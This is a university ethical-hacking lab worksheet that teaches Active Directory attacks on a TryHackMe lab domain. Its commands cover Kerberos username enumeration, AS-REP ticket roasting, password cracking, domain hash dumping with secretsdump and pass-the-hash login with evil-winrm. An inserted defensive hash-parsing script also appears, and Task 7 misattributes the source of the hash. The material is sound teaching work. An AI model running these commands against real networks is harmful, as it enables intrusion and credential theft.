ETHICAL HACKING - M30239
WEEK 7 - WINDOWS EXPLOITATION AND PASSWORD ATTACKS
28/03/2022 - 01/04/2022
OUTLINE
ETHICAL HACKING - M30239
WEEK 7 - WINDOWS EXPLOITATION AND PASSWORD ATTACKS
PART 0
Introduction
Prerequisite
Lab Environment
TASK 0 - Using the AttackBox
PART A - Windows Active Directory (AD) Exploitation
Task 1 - Discovery
Task 2 - Further Information Gathering or Enumeration
Task 3 - Kerberos
Task 4 - Dictionary attack
Task 5 - Gaining Access
Task 6 - Privilege Escalation
Task 7 - Pass the hash
PART 0
Introduction
Windows Active Directory (AD) is a service provided by Microsoft for managing domains, trees, and
forests. It is essentially a hierarchical structure that stores information about objects on the network. Objects
can be users, computers, peripheral devices, file shares, and security groups. The server running the
Active Directory Domain Services (AD DS) role is called the domain controller (DC). It is responsible for
the centralised management and security of the domain.
- Read more on Windows AD. We strongly recommend this room
https://tryhackme.com/room/activedirectorybasics
Prerequisite
- Complete previous weeks
Lab Environment
Throughout this unit, we will be using the resources on TryHackMe, including the Kali Linux AttackBox.
This allows us to use readily available Kali Linux and Ubuntu operating systems from anywhere.
YOU SHOULD ONLY ACCESS /EXPLOIT NON-PUBLIC RESOURCES WHERE YOU HAVE BEEN
GIVEN EXPRESS PERMISSION
TASK 0 - Using the AttackBox
1. Ensure that you are logged in with your student email i.e. up12345@myport.ac.uk.
2. Go to tryhackme.com/jr/2022uopwk7. Return to this document and follow the steps provided.
PART A - Windows Active Directory (AD) Exploitation
Before exploiting a physical AD environment, you would need to be within that environment. This could
be through being allowed access into the network legitimately, or by externally exploiting an object within the
AD environment, either through the usual exploitation techniques or by compromising misconfigurations
that expose the DC or another device within the network to the public.
After pre-engagement, the next step in pentesting an AD network would be to compromise a device
through the pentesting methodology (recon to reporting). After that, you can then enumerate the AD
network by scanning the network through the legitimate or compromised device.
In this lab, we will pretend that we have been given legitimate access within a corporate network.
Task 1 - Discovery
Now that we are within the network, we can go ahead and scan the domain controller. We will use nmap to
scan the target IP address and check for running services. Run the quick scan first and the longer scan after.
##Quick scan
nmap -A IP-ADDRESS
##Long Scan
In another terminal, do an aggressive scan for all possible ports.
nmap -A -p- IP-ADDRESS -Pn
While the long scan is running, we can look at the result of our quick scan.
We can see that several services are running, including HTTP and SMB. We can also easily identify that
this is the Domain Controller (DC), as it is running AD services like LDAP; the SSL certificate commonName
also confirms this. We can also identify the DC's domain name: spookysec.local.
Although penetration testing is a patient and persistent process, we need to use our time efficiently
by prioritising the most vulnerable places first.
Since we are well familiar with HTTP and SMB enumeration, we will start there.
Task 2 - Further Information Gathering or Enumeration
Easy HTTP enumeration
The fastest thing we can do with a service that is running HTTP is to visit the IP address in a web
browser: http://IP-ADDRESS
This does not tell us much, since we already know the server version from the nmap scan.
However, it confirms our suspicions.
SMB enumeration
Before enumerating SMB, let us add the domain 'spookysec.local' to our local hosts file so that we can use
the domain name instead of the IP.
echo IP-ADDRESS spookysec.local >> /etc/hosts
We could enumerate the SMB service manually, but we can also use an automated scanner
(enum4linux) that is capable of finding more information.
enum4linux -a spookysec.local | less
The results from enum4linux can be overwhelming, so we are going to use the pipe option to send the
output to the less command.
At first glance at our results, we are able to identify the known usernames on the DC as well as the running
services, including a file server service (SMB).
To see the next page, press the spacebar
We also identify further information like the domain name and SID. Visit the Microsoft SID
documentation. What does S-1-5-21 mean?
By using the spacebar, slowly observe and analyse the results of your scan. You should identify all user
information, such as Guest accounts and SIDs.
You might find several unknown users on the device. For now, ignore the unknown users. Slowly look
through the list to avoid missing other users, e.g. krbtgt.
When you are done, press Q to exit.
Research: On your favourite web search engine, search for "krbtgt".
We are able to identify that our DC is running the Kerberos service.
Task 3 - Kerberos
Kerberos is a network mutual-authentication protocol that allows users or services to communicate or
access services in a secure manner. It works by issuing tickets that allow users or services to prove their
identity.
To learn more about Kerberos and attacks on the protocol, we strongly recommend this room on THM.
Complete after this task.
Since Kerberos authenticates using supplied username and password credentials, we can attempt to
enumerate possible usernames by doing a wordlist (dictionary) attack with a fantastic tool called
Kerbrute.
## For Kali Linux
kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100
## For AttackBox/Kali
kerbrute -domain spookysec.local -users userlist.txt
# sudo pip3 install kerbrute
## Investigate how to find a username-based wordlist within Kali Linux.
Some useful wordlists:
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
## If you are using a different OS, see the installation instructions here:
https://pypi.org/project/kerbrute/
## pip3 install kerbrute # install through Python
We get about 16 possible valid usernames.
Retrieving Kerberos ticket
Next, we will use Impacket to retrieve a Kerberos ticket (an AS-REP) for the svc-admin account and then
attempt to crack it offline. If you are using the AttackBox, it is already installed.
python3 /usr/local/bin/GetNPUsers.py spookysec.local/svc-admin -no-pass
If you are using Kali Linux, download the script first:
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetNPUsers.py
You should have a ticket hash after this line.
Copy the hash and save it in a file. I would call mine hashfile.
Task 4 - Dictionary attack.
Next, we will use John the Ripper to attempt to crack the hash.
john hashfile --wordlist=/usr/share/wordlists/rockyou.txt
## Find a password list
We should now have retrieved the password for svc-admin.
Task 5 - Gaining Access
SMB PATHWAY
Since we know that the SMB protocol is running, we can attempt to use our compromised credentials to log in
via SMB.
Installing SMBMAP
git clone https://github.com/ShawnDEvans/smbmap && cd smbmap
python3 -m pip install -r requirements.txt
Using smbmap to view the shares
python3 -m smbmap -H spookysec.local -d spookysec.local -u svc-admin -p PASSWORD
Alternatively, you have used smbclient in the recent past; do you remember the syntax of the command?
##smbclient -L ….
Pick a share and use smbclient to login to a share e.g. backup
smbclient \\\\spookysec.local\\backup --user svc-admin
Alternative
We can attempt to use our previous knowledge of Metasploit from last week to login to the server.
Start msfconsole by running the following command
msfconsole
Search for smb modules
search smb ## Which of the modules can you use?
Task 6 - Privilege Escalation
Refer back to previous labs and attempt to perform privilege escalation using a similar technique.
TIP: Use impacket, either through Metasploit or directly.
TIP: Dump all the hashes.
On Metasploit: Full documentation on using secretsdump
msfconsole
use auxiliary/scanner/smb/impacket/secretsdump
options ## set all your options
exploit
Secretsdump directly on Attackbox
/opt/impacket/examples/secretsdump.py
secretsdump.py -just-dc username@spookysec.local
Secretsdump on Kali Linux
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/secretsdump.py
secretsdump.py -just-dc username@spookysec.local
PSEXEC
NOTE:
Please note that Windows used to rely on LM hashing to store passwords
(https://en.wikipedia.org/wiki/LAN_Manager#LM_hash_details) but has since moved over to using
NTLM (https://en.wikipedia.org/wiki/NT_LAN_Manager).
For the output line Jon:1000:aad3b435b51404eeaad3b435b51404ee:733db9d83b56cfce2ed7d2865f02bda6:::
This can be broken down into the following:
user: Jon
RID: 1000
LM hash: aad3b435b51404eeaad3b435b51404ee
NT hash: 733db9d83b56cfce2ed7d2865f02bda6
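As an added defensive illustration (not part of the lab, and not Impacket's code), the following Python parses dump lines in the format broken down above and flags accounts that still carry a legacy LM hash or have a blank password. The sample dump is constructed apart from the Jon line quoted above; the optional domain\user form it accepts is the one secretsdump -just-dc prints.

```python
# Parse secretsdump-style hash lines (user:RID:LM:NT:::) and flag weak storage.
# Added example for this worksheet, not part of the lab or of Impacket; the
# sample dump below is constructed except the Jon line, which the worksheet quotes.
import re
from typing import Dict, Iterable, List, Optional

# LM hash of the empty string: what the dump shows when LM hashing is disabled
# (the modern default), i.e. there is no crackable LM hash for the account.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password: the account has no password set at all.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Optional "domain\" prefix (as in -just-dc output), then user:rid:lm:nt:::
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.IGNORECASE)


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Break one hash line into its fields; None for status or other lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    lm, nt = m["lm"].lower(), m["nt"].lower()
    return {"domain": m["domain"], "user": m["user"], "rid": int(m["rid"]),
            "lm": lm, "nt": nt,
            "lm_present": lm != EMPTY_LM,      # legacy LM hash still stored
            "blank_password": nt == EMPTY_NT}  # empty password


def audit(lines: Iterable[str]) -> Dict[str, object]:
    """Summarise a dump: accounts still carrying LM hashes or blank passwords."""
    recs = [r for r in map(parse_line, lines) if r is not None]
    return {"parsed": len(recs),
            "lm_accounts": [r["user"] for r in recs if r["lm_present"]],
            "blank_accounts": [r["user"] for r in recs if r["blank_password"]]}


SAMPLE: List[str] = [  # constructed dump; only the Jon line comes from the worksheet
    "Jon:1000:aad3b435b51404eeaad3b435b51404ee:733db9d83b56cfce2ed7d2865f02bda6:::",
    "spookysec.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "spookysec.local\\legacy:1105:0123456789abcdef0123456789abcdef:733db9d83b56cfce2ed7d2865f02bda6:::",
    "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)",  # status line, skipped
]

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Accounts listed under lm_accounts are the ones a defender should fix first, since an LM hash is far cheaper to crack than the NT hash beside it.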
Some tools for password cracking
1. John
2. Hashcat
3. Online resources
Investigate how to use these resources. Use the man command.
Task 7 - Pass the hash
Use the hash retrieved from the Kerberos ticket.
evil-winrm -i spookysec.local -H add-the-retrieved-hash-here --user administrator